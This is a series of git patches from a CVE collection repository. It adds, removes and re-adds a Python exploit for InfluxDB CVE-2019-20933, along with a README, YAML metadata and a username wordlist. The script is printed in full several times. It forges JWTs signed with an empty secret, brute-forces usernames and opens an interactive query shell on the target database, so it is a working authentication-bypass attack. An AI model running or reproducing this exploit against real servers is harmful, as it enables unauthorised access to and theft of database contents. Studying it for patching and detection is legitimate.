try: + query = input("[{}@{}/{}] $ ".format(colored(username, "red"), colored(host, "yellow"), colored(db, "blue"))) + except KeyboardInterrupt: + break + + if query.strip() == "": + continue + + if query in ['.exit', '.quit', '.back']: + break + + response = makeQuery(token, db, host, port, query) + response = json.loads(response) + print(json.dumps(response, indent=4, sort_keys=True)) + + +if __name__ == '__main__': + print(colored(""" + _____ __ _ _____ ____ ______ _ _ _ + |_ _| / _| | | __ \| _ \ | ____| | | (_) | + | | _ __ | |_| |_ ___ __ | | | |_) | | |__ __ ___ __ | | ___ _| |_ + | | | '_ \| _| | | | \ \/ / | | | _ < | __| \ \/ / '_ \| |/ _ \| | __| + _| |_| | | | | | | |_| |> <| |__| | |_) | | |____ > <| |_) | | (_) | | |_ + |_____|_| |_|_| |_|\__,_/_/\_\_____/|____/ |______/_/\_\ .__/|_|\___/|_|\__| + | | + |_| """, 'green')) + print(colored(" - using CVE-2019-20933", "yellow")) + + exploit() diff --git a/cve/InfluxDB/CVE-2019-20933/requirements.txt b/cve/InfluxDB/CVE-2019-20933/requirements.txt new file mode 100644 index 00000000..a345330c --- /dev/null +++ b/cve/InfluxDB/CVE-2019-20933/requirements.txt @@ -0,0 +1,4 @@ +urllib3 +requests +PyJWT +termcolor diff --git a/cve/InfluxDB/CVE-2019-20933/users.txt b/cve/InfluxDB/CVE-2019-20933/users.txt new file mode 100644 index 00000000..802b77da --- /dev/null +++ b/cve/InfluxDB/CVE-2019-20933/users.txt @@ -0,0 +1,7 @@ +admin +user +root +database +db +influx +influxdb -- Gitee From ecc3278d5f09ca1423ef5bbf573a9720b45b03df Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 02:37:42 +0000 Subject: [PATCH 16/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/CVE-2019-20933/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/CVE-2019-20933/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/InfluxDB/CVE-2019-20933/.keep diff --git a/cve/InfluxDB/CVE-2019-20933/.keep b/cve/InfluxDB/CVE-2019-20933/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 7d3dce5ae7d04cb1e3192e50e2d3a2ae953e1fd7 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 02:38:03 +0000 Subject: [PATCH 17/40] CVE-2019-20933 yaml Signed-off-by: Zentung0628 --- cve/InfluxDB/yaml/CVE-2019-20933.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cve/InfluxDB/yaml/CVE-2019-20933.yaml diff --git a/cve/InfluxDB/yaml/CVE-2019-20933.yaml b/cve/InfluxDB/yaml/CVE-2019-20933.yaml new file mode 100644 index 00000000..ec29dcb4 --- /dev/null +++ b/cve/InfluxDB/yaml/CVE-2019-20933.yaml @@ -0,0 +1,19 @@ +id: 2019-20933 +source: +info: + name: InfluxDB是一个开源的分布式时序数据库,主要用于存储和查询时间序列数据 + severity: critical + description: | + 利用 InfluxDB CVE-2019-20933 漏洞,InfluxDB 1.7.6 之前的 services/httpd/handler.go 中的 authenticate 函数存在身份验证绕过漏洞,因为 JWT token 可能有一个空的 SharedSecret(又名共享秘密)。 利用检查服务器是否易受攻击,然后它会尝试获取远程查询 shell。 它内置了用户名暴力破解服务。 + scope-of-influence: +InfluxDB 1.7.0至1.7.9和2.0.0-alpha至2.0.0-alpha.5版本 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9 + cve-id: CVE-2019-20933 + cwe-id: CWE-78 + cnvd-id: CNVD-2020-03627 + kve-id: KVE-2019-1372 + tags: RCE,cve2019,任意文件读取 \ No newline at end of file -- Gitee From e148cbce6b1e926850e086eead7a280bed8a9e78 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 02:38:08 +0000 Subject: [PATCH 18/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/InfluxDB/yaml/.keep diff --git a/cve/InfluxDB/yaml/.keep b/cve/InfluxDB/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 21436807f90c22e8915de98c02b460f1bd701cfb Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 04:21:08 +0000 Subject: [PATCH 19/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/yaml/CVE-2019-20933.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/yaml/CVE-2019-20933.yaml | 19 ------------------- 1 file changed, 19 deletions(-) delete mode 100644 cve/InfluxDB/yaml/CVE-2019-20933.yaml diff --git a/cve/InfluxDB/yaml/CVE-2019-20933.yaml b/cve/InfluxDB/yaml/CVE-2019-20933.yaml deleted file mode 100644 index ec29dcb4..00000000 --- a/cve/InfluxDB/yaml/CVE-2019-20933.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: 2019-20933 -source: -info: - name: InfluxDB是一个开源的分布式时序数据库,主要用于存储和查询时间序列数据 - severity: critical - description: | - 利用 InfluxDB CVE-2019-20933 漏洞,InfluxDB 1.7.6 之前的 services/httpd/handler.go 中的 authenticate 函数存在身份验证绕过漏洞,因为 JWT token 可能有一个空的 SharedSecret(又名共享秘密)。 利用检查服务器是否易受攻击,然后它会尝试获取远程查询 shell。 它内置了用户名暴力破解服务。 - scope-of-influence: -InfluxDB 1.7.0至1.7.9和2.0.0-alpha至2.0.0-alpha.5版本 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9 - cve-id: CVE-2019-20933 - cwe-id: CWE-78 - cnvd-id: CNVD-2020-03627 - kve-id: KVE-2019-1372 - tags: RCE,cve2019,任意文件读取 \ No newline at end of file -- Gitee From 99b7a305468a1c4f483ec5bf45ef8b5942addad1 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 04:21:34 +0000 Subject: [PATCH 20/40] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/InfluxDB/yaml/.keep diff --git a/cve/InfluxDB/yaml/.keep b/cve/InfluxDB/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 5bb5a09440e25b655eaa2f3017a48339d6a805b9 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 04:21:56 +0000 Subject: [PATCH 21/40] CVE-2019-20933 yaml Signed-off-by: Zentung0628 --- cve/InfluxDB/yaml/CVE-2019-20933.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cve/InfluxDB/yaml/CVE-2019-20933.yaml diff --git a/cve/InfluxDB/yaml/CVE-2019-20933.yaml b/cve/InfluxDB/yaml/CVE-2019-20933.yaml new file mode 100644 index 00000000..6a0ff454 --- /dev/null +++ b/cve/InfluxDB/yaml/CVE-2019-20933.yaml @@ -0,0 +1,19 @@ +id: CVE-2019-20933 +source: https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 +info: + name: InfluxDB 1.7.6之前版本中的services/httpd/handler.go中的authenticate函数存在认证绕过漏洞。该漏洞源于JWT令牌可能具有空SharedSecret。攻击者可利用该漏洞绕过认证。 + severity: critical + description: | + InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). + scope-of-influence: + InfluxData InfluxDB <1.7.6 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-20933 + cwe-id: CWE-287 + cnvd-id: CNVD-2022-06547 + kve-id: None + tags: RCE, cve2019, 任意文件读取 \ No newline at end of file -- Gitee From 3931eb113a3056b10049f2e35cc65452daa0dde5 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 04:22:02 +0000 Subject: [PATCH 22/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/InfluxDB/yaml/.keep diff --git a/cve/InfluxDB/yaml/.keep b/cve/InfluxDB/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 092431896b1d94fb652a52a62986a6a9b4efa7fb Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:45:42 +0000 Subject: [PATCH 23/40] update cve/InfluxDB/yaml/CVE-2019-20933.yaml. Signed-off-by: Zentung0628 --- cve/InfluxDB/yaml/CVE-2019-20933.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/InfluxDB/yaml/CVE-2019-20933.yaml b/cve/InfluxDB/yaml/CVE-2019-20933.yaml index 6a0ff454..7902e771 100644 --- a/cve/InfluxDB/yaml/CVE-2019-20933.yaml +++ b/cve/InfluxDB/yaml/CVE-2019-20933.yaml @@ -6,7 +6,7 @@ info: description: | InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). scope-of-influence: - InfluxData InfluxDB <1.7.6 + InfluxData InfluxDB <1.7.6 reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 classification: -- Gitee From cc3c0183c86438323f657343d3e7c4c622633326 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:46:06 +0000 Subject: [PATCH 24/40] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202019?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/InfluxDB/2019/.keep diff --git a/cve/InfluxDB/2019/.keep b/cve/InfluxDB/2019/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From e44772af56809b9d31e9f0d0250b24f296a3a49a Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:47:15 +0000 Subject: [PATCH 25/40] CVE-2019-20933 Signed-off-by: Zentung0628 --- cve/InfluxDB/2019/README.md | 16 +++ cve/InfluxDB/2019/__main__.py | 185 +++++++++++++++++++++++++++++ cve/InfluxDB/2019/requirements.txt | 4 + cve/InfluxDB/2019/users.txt | 7 ++ 4 files changed, 212 insertions(+) create mode 100644 cve/InfluxDB/2019/README.md create mode 100644 cve/InfluxDB/2019/__main__.py create mode 100644 cve/InfluxDB/2019/requirements.txt create mode 100644 cve/InfluxDB/2019/users.txt diff --git a/cve/InfluxDB/2019/README.md b/cve/InfluxDB/2019/README.md new file mode 100644 index 00000000..dad0665f --- /dev/null +++ b/cve/InfluxDB/2019/README.md @@ -0,0 +1,16 @@ +# InfluxDB Exploit CVE-2019-20933 + +Exploit for InfluxDB CVE-2019-20933 vulnerability, InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). +Exploit check if server is vulnerable, then it tries to get a remote query shell. It has built in a username bruteforce service. + +## Installation +``` +git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git +cd InfluxDB-Exploit-CVE-2019-20933 +pip install -r requirements.txt +``` + +## Usage +``` +python __main__.py +``` diff --git a/cve/InfluxDB/2019/__main__.py b/cve/InfluxDB/2019/__main__.py new file mode 100644 index 00000000..e38d12f4 --- /dev/null +++ b/cve/InfluxDB/2019/__main__.py @@ -0,0 +1,185 @@ +#!/bin/env python + +import json +import pathlib +import time +import urllib +import requests as requests +import jwt +from termcolor import colored + +def bruteforceUser(filename, host, port): + print() + print("Bruteforcing usernames ...") + with open(filename) as f: + for line in f: + line = line.replace("\n", "") + exp = int(time.time()) + exp = exp + 2.628 * 10 ** 6 + # Generation JWT + payload = { + "username": line, + "exp": exp + } + + token = jwt.encode(payload, "", algorithm="HS256") + query = "SHOW DATABASES" + response = makeQuery(token, 'dummy', host, port, query) + response = json.loads(response) + if "error" in response.keys(): + if "signature is invalid" in response['error']: + print(colored("ERROR: Host not vulnerable !!!", "red")) + print(colored("ERROR: " + response['error'] + "", "red")) + exit(1) + if "user not found" in response['error']: + print("[{}] {}".format(colored("x", "red"), line)) + else: + print("[{}] {}".format(colored("v", "green"), line)) + print() + username = line + return username + + print(colored("ERROR: no valid username found !!!", "red")) + exit(1) + +def makeQuery(token, db, host, port, query): + try: + headers = { + 'Authorization': 'Bearer ' + token, + } + except: + token = token.decode("utf-8") + headers = { + 'Authorization': 'Bearer ' + token, + } + + # Send request + query = urllib.parse.quote_plus(query) + response = requests.get('http://' + host + ':' + str(port) + '/query?db=' + db + '&q=' + query, headers=headers) + return response.text + +def exploit(): + # imput data + print() + try: + host = input("Host (default: localhost): ") + except KeyboardInterrupt: + return + + if host == "": + host = "127.0.0.1" + + try: + port = input("Port (default: 8086): ") + except KeyboardInterrupt: + return + if port == "": + port = 8086 + + try: + username = input("Username path to username file (default: users.txt): ") + except KeyboardInterrupt: + return + + if username == "": + username = "users.txt" + + # check if username is a valid file to start bruteforce + file = pathlib.Path(username) + if file.exists(): + username = bruteforceUser(username, host, port) + + exp = int(time.time()) + exp = exp + 2.628 * 10 ** 6 # Aggiungo un mese + + # Generation JWT + payload = { + "username": username, + "exp": exp + } + + token = jwt.encode(payload, "", algorithm="HS256") + #print("Token: {}".format(token)) + query = "SHOW DATABASES" + response = makeQuery(token, 'dummy', host, port, query) + response = json.loads(response) + + if "results" in response.keys(): + print(colored("Host vulnerable !!!", "green")) + else: + print(colored("ERROR: Host not vulnerable !!!", "red")) + print(colored("ERROR: "+response['error']+"", "red")) + return + + # Get databases list + dblist = [db[0] for db in response['results'][0]['series'][0]['values']] + + while True: + print() + print("Databases:") + print() + for (i, db) in enumerate(dblist): + print("{}) {}".format(i + 1, db)) + + print() + print(".quit to exit") + + + try: + db = input("[{}@{}] Database: ".format(colored(username, "red"), colored(host, "yellow"))) + except KeyboardInterrupt: + print() + print("~ Bye!") + break + + try: + db = dblist[int(db) - 1] + except IndexError as e: + # Prompt again if database index if not in range + continue + except Exception as e: + # Check if database exists if its a string + if db.strip() == "": + continue + if db not in dblist: + print(colored("[Error] ", "red") + "No such database: \"" + colored(db, "yellow") + "\"") + continue + pass + + if db in ['.exit', '.quit', '.back']: + return + if db == "": + continue + + print() + print("Starting InfluxDB shell - .back to go back") + while True: + try: + query = input("[{}@{}/{}] $ ".format(colored(username, "red"), colored(host, "yellow"), colored(db, "blue"))) + except KeyboardInterrupt: + break + + if query.strip() == "": + continue + + if query in ['.exit', '.quit', '.back']: + break + + response = makeQuery(token, db, host, port, query) + response = json.loads(response) + print(json.dumps(response, indent=4, sort_keys=True)) + + +if __name__ == '__main__': + print(colored(""" + _____ __ _ _____ ____ ______ _ _ _ + |_ _| / _| | | __ \| _ \ | ____| | | (_) | + | | _ __ | |_| |_ ___ __ | | | |_) | | |__ __ ___ __ | | ___ _| |_ + | | | '_ \| _| | | | \ \/ / | | | _ < | __| \ \/ / '_ \| |/ _ \| | __| + _| |_| | | | | | | |_| |> <| |__| | |_) | | |____ > <| |_) | | (_) | | |_ + |_____|_| |_|_| |_|\__,_/_/\_\_____/|____/ |______/_/\_\ .__/|_|\___/|_|\__| + | | + |_| """, 'green')) + print(colored(" - using CVE-2019-20933", "yellow")) + + exploit() diff --git a/cve/InfluxDB/2019/requirements.txt b/cve/InfluxDB/2019/requirements.txt new file mode 100644 index 00000000..a345330c --- /dev/null +++ b/cve/InfluxDB/2019/requirements.txt @@ -0,0 +1,4 @@ +urllib3 +requests +PyJWT +termcolor diff --git a/cve/InfluxDB/2019/users.txt b/cve/InfluxDB/2019/users.txt new file mode 100644 index 00000000..802b77da --- /dev/null +++ b/cve/InfluxDB/2019/users.txt @@ -0,0 +1,7 @@ +admin +user +root +database +db +influx +influxdb -- Gitee From fc124b40e4975c46b41385feb502bc22e1ab9be0 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:47:21 +0000 Subject: [PATCH 26/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/2019/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/InfluxDB/2019/.keep diff --git a/cve/InfluxDB/2019/.keep b/cve/InfluxDB/2019/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 996687c6488008377a0044cf92e5f273761827a2 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:47:37 +0000 Subject: [PATCH 27/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/2019?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/2019/README.md | 16 --- cve/InfluxDB/2019/__main__.py | 185 ----------------------------- cve/InfluxDB/2019/requirements.txt | 4 - cve/InfluxDB/2019/users.txt | 7 -- 4 files changed, 212 deletions(-) delete mode 100644 cve/InfluxDB/2019/README.md delete mode 100644 cve/InfluxDB/2019/__main__.py delete mode 100644 cve/InfluxDB/2019/requirements.txt delete mode 100644 cve/InfluxDB/2019/users.txt diff --git a/cve/InfluxDB/2019/README.md b/cve/InfluxDB/2019/README.md deleted file mode 100644 index dad0665f..00000000 --- a/cve/InfluxDB/2019/README.md +++ /dev/null @@ -1,16 +0,0 @@ -# InfluxDB Exploit CVE-2019-20933 - -Exploit for InfluxDB CVE-2019-20933 vulnerability, InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). -Exploit check if server is vulnerable, then it tries to get a remote query shell. It has built in a username bruteforce service. - -## Installation -``` -git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git -cd InfluxDB-Exploit-CVE-2019-20933 -pip install -r requirements.txt -``` - -## Usage -``` -python __main__.py -``` diff --git a/cve/InfluxDB/2019/__main__.py b/cve/InfluxDB/2019/__main__.py deleted file mode 100644 index e38d12f4..00000000 --- a/cve/InfluxDB/2019/__main__.py +++ /dev/null @@ -1,185 +0,0 @@ -#!/bin/env python - -import json -import pathlib -import time -import urllib -import requests as requests -import jwt -from termcolor import colored - -def bruteforceUser(filename, host, port): - print() - print("Bruteforcing usernames ...") - with open(filename) as f: - for line in f: - line = line.replace("\n", "") - exp = int(time.time()) - exp = exp + 2.628 * 10 ** 6 - # Generation JWT - payload = { - "username": line, - "exp": exp - } - - token = jwt.encode(payload, "", algorithm="HS256") - query = "SHOW DATABASES" - response = makeQuery(token, 'dummy', host, port, query) - response = json.loads(response) - if "error" in response.keys(): - if "signature is invalid" in response['error']: - print(colored("ERROR: Host not vulnerable !!!", "red")) - print(colored("ERROR: " + response['error'] + "", "red")) - exit(1) - if "user not found" in response['error']: - print("[{}] {}".format(colored("x", "red"), line)) - else: - print("[{}] {}".format(colored("v", "green"), line)) - print() - username = line - return username - - print(colored("ERROR: no valid username found !!!", "red")) - exit(1) - -def makeQuery(token, db, host, port, query): - try: - headers = { - 'Authorization': 'Bearer ' + token, - } - except: - token = token.decode("utf-8") - headers = { - 'Authorization': 'Bearer ' + token, - } - - # Send request - query = urllib.parse.quote_plus(query) - response = requests.get('http://' + host + ':' + str(port) + '/query?db=' + db + '&q=' + query, headers=headers) - return response.text - -def exploit(): - # imput data - print() - try: - host = input("Host (default: localhost): ") - except KeyboardInterrupt: - return - - if host == "": - host = "127.0.0.1" - - try: - port = input("Port (default: 8086): ") - except KeyboardInterrupt: - return - if port == "": - port = 8086 - - try: - username = input("Username path to username file (default: users.txt): ") - except KeyboardInterrupt: - return - - if username == "": - username = "users.txt" - - # check if username is a valid file to start bruteforce - file = pathlib.Path(username) - if file.exists(): - username = bruteforceUser(username, host, port) - - exp = int(time.time()) - exp = exp + 2.628 * 10 ** 6 # Aggiungo un mese - - # Generation JWT - payload = { - "username": username, - "exp": exp - } - - token = jwt.encode(payload, "", algorithm="HS256") - #print("Token: {}".format(token)) - query = "SHOW DATABASES" - response = makeQuery(token, 'dummy', host, port, query) - response = json.loads(response) - - if "results" in response.keys(): - print(colored("Host vulnerable !!!", "green")) - else: - print(colored("ERROR: Host not vulnerable !!!", "red")) - print(colored("ERROR: "+response['error']+"", "red")) - return - - # Get databases list - dblist = [db[0] for db in response['results'][0]['series'][0]['values']] - - while True: - print() - print("Databases:") - print() - for (i, db) in enumerate(dblist): - print("{}) {}".format(i + 1, db)) - - print() - print(".quit to exit") - - - try: - db = input("[{}@{}] Database: ".format(colored(username, "red"), colored(host, "yellow"))) - except KeyboardInterrupt: - print() - print("~ Bye!") - break - - try: - db = dblist[int(db) - 1] - except IndexError as e: - # Prompt again if database index if not in range - continue - except Exception as e: - # Check if database exists if its a string - if db.strip() == "": - continue - if db not in dblist: - print(colored("[Error] ", "red") + "No such database: \"" + colored(db, "yellow") + "\"") - continue - pass - - if db in ['.exit', '.quit', '.back']: - return - if db == "": - continue - - print() - print("Starting InfluxDB shell - .back to go back") - while True: - try: - query = input("[{}@{}/{}] $ ".format(colored(username, "red"), colored(host, "yellow"), colored(db, "blue"))) - except KeyboardInterrupt: - break - - if query.strip() == "": - continue - - if query in ['.exit', '.quit', '.back']: - break - - response = makeQuery(token, db, host, port, query) - response = json.loads(response) - print(json.dumps(response, indent=4, sort_keys=True)) - - -if __name__ == '__main__': - print(colored(""" - _____ __ _ _____ ____ ______ _ _ _ - |_ _| / _| | | __ \| _ \ | ____| | | (_) | - | | _ __ | |_| |_ ___ __ | | | |_) | | |__ __ ___ __ | | ___ _| |_ - | | | '_ \| _| | | | \ \/ / | | | _ < | __| \ \/ / '_ \| |/ _ \| | __| - _| |_| | | | | | | |_| |> <| |__| | |_) | | |____ > <| |_) | | (_) | | |_ - |_____|_| |_|_| |_|\__,_/_/\_\_____/|____/ |______/_/\_\ .__/|_|\___/|_|\__| - | | - |_| """, 'green')) - print(colored(" - using CVE-2019-20933", "yellow")) - - exploit() diff --git a/cve/InfluxDB/2019/requirements.txt b/cve/InfluxDB/2019/requirements.txt deleted file mode 100644 index a345330c..00000000 --- a/cve/InfluxDB/2019/requirements.txt +++ /dev/null @@ -1,4 +0,0 @@ -urllib3 -requests -PyJWT -termcolor diff --git a/cve/InfluxDB/2019/users.txt b/cve/InfluxDB/2019/users.txt deleted file mode 100644 index 802b77da..00000000 --- a/cve/InfluxDB/2019/users.txt +++ /dev/null @@ -1,7 +0,0 @@ -admin -user -root -database -db -influx -influxdb -- Gitee From b2c421c027b241d521cabf1705f1a7e8c68c4111 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:47:54 +0000 Subject: [PATCH 28/40] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202019?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/InfluxDB/2019/.keep diff --git a/cve/InfluxDB/2019/.keep b/cve/InfluxDB/2019/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From dde920153b2f631363584301242826e6981c5a08 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:48:02 +0000 Subject: [PATCH 29/40] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-20933?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/2019/CVE-2019-20933/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/InfluxDB/2019/CVE-2019-20933/.keep diff --git a/cve/InfluxDB/2019/CVE-2019-20933/.keep b/cve/InfluxDB/2019/CVE-2019-20933/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 8db8a26eefa3fe042151ef54efb5b5559ebdc859 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:48:18 +0000 Subject: [PATCH 30/40] CVE-2019-20933 Signed-off-by: Zentung0628 --- cve/InfluxDB/2019/CVE-2019-20933/README.md | 16 ++ cve/InfluxDB/2019/CVE-2019-20933/__main__.py | 185 ++++++++++++++++++ .../2019/CVE-2019-20933/requirements.txt | 4 + cve/InfluxDB/2019/CVE-2019-20933/users.txt | 7 + 4 files changed, 212 insertions(+) create mode 100644 cve/InfluxDB/2019/CVE-2019-20933/README.md create mode 100644 cve/InfluxDB/2019/CVE-2019-20933/__main__.py create mode 100644 cve/InfluxDB/2019/CVE-2019-20933/requirements.txt create mode 100644 cve/InfluxDB/2019/CVE-2019-20933/users.txt diff --git a/cve/InfluxDB/2019/CVE-2019-20933/README.md b/cve/InfluxDB/2019/CVE-2019-20933/README.md new file mode 100644 index 00000000..dad0665f --- /dev/null +++ b/cve/InfluxDB/2019/CVE-2019-20933/README.md @@ -0,0 +1,16 @@ +# InfluxDB Exploit CVE-2019-20933 + +Exploit for InfluxDB CVE-2019-20933 vulnerability, InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). +Exploit check if server is vulnerable, then it tries to get a remote query shell. It has built in a username bruteforce service. + +## Installation +``` +git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git +cd InfluxDB-Exploit-CVE-2019-20933 +pip install -r requirements.txt +``` + +## Usage +``` +python __main__.py +``` diff --git a/cve/InfluxDB/2019/CVE-2019-20933/__main__.py b/cve/InfluxDB/2019/CVE-2019-20933/__main__.py new file mode 100644 index 00000000..e38d12f4 --- /dev/null +++ b/cve/InfluxDB/2019/CVE-2019-20933/__main__.py @@ -0,0 +1,185 @@ +#!/bin/env python + +import json +import pathlib +import time +import urllib +import requests as requests +import jwt +from termcolor import colored + +def bruteforceUser(filename, host, port): + print() + print("Bruteforcing usernames ...") + with open(filename) as f: + for line in f: + line = line.replace("\n", "") + exp = int(time.time()) + exp = exp + 2.628 * 10 ** 6 + # Generation JWT + payload = { + "username": line, + "exp": exp + } + + token = jwt.encode(payload, "", algorithm="HS256") + query = "SHOW DATABASES" + response = makeQuery(token, 'dummy', host, port, query) + response = json.loads(response) + if "error" in response.keys(): + if "signature is invalid" in response['error']: + print(colored("ERROR: Host not vulnerable !!!", "red")) + print(colored("ERROR: " + response['error'] + "", "red")) + exit(1) + if "user not found" in response['error']: + print("[{}] {}".format(colored("x", "red"), line)) + else: + print("[{}] {}".format(colored("v", "green"), line)) + print() + username = line + return username + + print(colored("ERROR: no valid username found !!!", "red")) + exit(1) + +def makeQuery(token, db, host, port, query): + try: + headers = { + 'Authorization': 'Bearer ' + token, + } + except: + token = token.decode("utf-8") + headers = { + 'Authorization': 'Bearer ' + token, + } + + # Send request + query = urllib.parse.quote_plus(query) + response = requests.get('http://' + host + ':' + str(port) + '/query?db=' + db + '&q=' + query, headers=headers) + return response.text + +def exploit(): + # imput data + print() + try: + host = input("Host (default: localhost): ") + except KeyboardInterrupt: + return + + if host == "": + host = "127.0.0.1" + + try: + port = input("Port (default: 8086): ") + except KeyboardInterrupt: + return + if port == "": + port = 8086 + + try: + username = input("Username path to username file (default: users.txt): ") + except KeyboardInterrupt: + return + + if username == "": + username = "users.txt" + + # check if username is a valid file to start bruteforce + file = pathlib.Path(username) + if file.exists(): + username = bruteforceUser(username, host, port) + + exp = int(time.time()) + exp = exp + 2.628 * 10 ** 6 # Aggiungo un mese + + # Generation JWT + payload = { + "username": username, + "exp": exp + } + + token = jwt.encode(payload, "", algorithm="HS256") + #print("Token: {}".format(token)) + query = "SHOW DATABASES" + response = makeQuery(token, 'dummy', host, port, query) + response = json.loads(response) + + if "results" in response.keys(): + print(colored("Host vulnerable !!!", "green")) + else: + print(colored("ERROR: Host not vulnerable !!!", "red")) + print(colored("ERROR: "+response['error']+"", "red")) + return + + # Get databases list + dblist = [db[0] for db in response['results'][0]['series'][0]['values']] + + while True: + print() + print("Databases:") + print() + for (i, db) in enumerate(dblist): + print("{}) {}".format(i + 1, db)) + + print() + print(".quit to exit") + + + try: + db = input("[{}@{}] Database: ".format(colored(username, "red"), colored(host, 